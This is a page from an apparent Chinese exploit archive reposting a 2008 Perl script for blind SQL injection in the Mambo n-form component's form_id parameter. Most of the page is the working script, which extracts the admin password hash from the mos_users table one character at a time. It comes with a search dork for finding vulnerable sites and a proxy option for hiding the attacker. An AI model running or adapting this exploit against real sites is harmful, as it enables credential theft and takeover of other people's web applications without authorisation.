首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Mambo Component n-form (form_id) Blind SQL Injection Exploit
来源:www.khg-crew.ws 作者:boom3rang 发布时间:2008-11-10  
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;

if(!$ARGV[1])
{
system("Title Kosova Hackers Group by boom3rang");
print " \n";
print " #######################################################################\n";
print "  #   Mambo Component n-form(form_id) Blind SQL Injection Exploit \n";
print "  # -----------------------------------------------------------\n";
print "  #   Author: boom3rang [www.khg-crew.ws] \n";
print "  #   Greetz: H!tmaN, KHG, chs, redc00de - Kosova Hackers Group\n";
print "  #   Site:   www.khg-crew.ws\n";
print "  # -----------------------------------------------------------\n";
print "  #   Dork :   inurl:option=com_n-forms form_id \n";
print "  #   Usage:   perl exploit.pl host path <options> \n";
print "  #   Example: perl exploit.pl www.host.com /path/ -a 3 \n";
print "  # -----------------------------------------------------------\n";
print "  #   Options: \n";
print "  #     -a   valid form id \n";
print " #######################################################################\n";
exit;
}

my $host    = $ARGV[0];
my $path    = $ARGV[1];
my $userid  = 1;
my $aid     = $ARGV[2];

my %options = ();
GetOptions(\%options, "u=i", "p=s", "a=i");

print "[~] Exploiting...\n";

if($options{"u"})
{
$userid = $options{"u"};
}

if($options{"a"})
{
$aid = $options{"a"};
}

syswrite(STDOUT, "[~] MD5-Hash: ", 14);

for(my $i = 1; $i <= 32; $i++)
{
my $f = 0;
my $h = 48;
while(!$f && $h <= 57)
{
   if(istrue2($host, $path, $userid, $aid, $i, $h))
   {
     $f = 1;
     syswrite(STDOUT, chr($h), 1);
   }
   $h++;
}
if(!$f)
{
   $h = 97;
   while(!$f && $h <= 122)
   {
     if(istrue2($host, $path, $userid, $aid, $i, $h))
     {
       $f = 1;
       syswrite(STDOUT, chr($h), 1);
     }
     $h++;
   }
}
}

print "\n[~] Exploiting done\n";

sub istrue2
{
my $host  = shift;
my $path  = shift;
my $uid   = shift;
my $aid   = shift;
my $i     = shift;
my $h     = shift;

my $ua = LWP::UserAgent->new;
my $query = "http://".$host.$path."index.php?option=com_n-forms&form_id=".$aid." and ascii(SUBSTRING((SELECT password FROM mos_users LIMIT 0,1),".$i.",1))=".$h."";

if($options{"p"})
{
   $ua->proxy('http', "http://".$options{"p"});
}

my $resp = $ua->get($query);
my $content = $resp->content;
my $regexp = "Back";

if($content =~ /$regexp/)
{
   return 1;
}
else
{
   return 0;
}

}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MemHT Portal <= 4.0 Remote Cod
·GE Proficy Real Time Informati
·VLC Media Player < 0.9.6 .RT S
·e-Vision CMS <= 2.0.2 Multiple
·Simple Machines Forum <= 1.1.6
·PhpCms2007 sp6 SQL injection 0
·Adobe Reader util.printf() Jav
·PHPX 3.5.16 (news_id) Remote S
·ooVoo 1.7.1.35 (URL Protocol)
·smcFanControl 2.1.2 Multiple B
·Linux Kernel < 2.4.36.9/2.6.27
·Simple Machines Forum (SMF) 1.
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved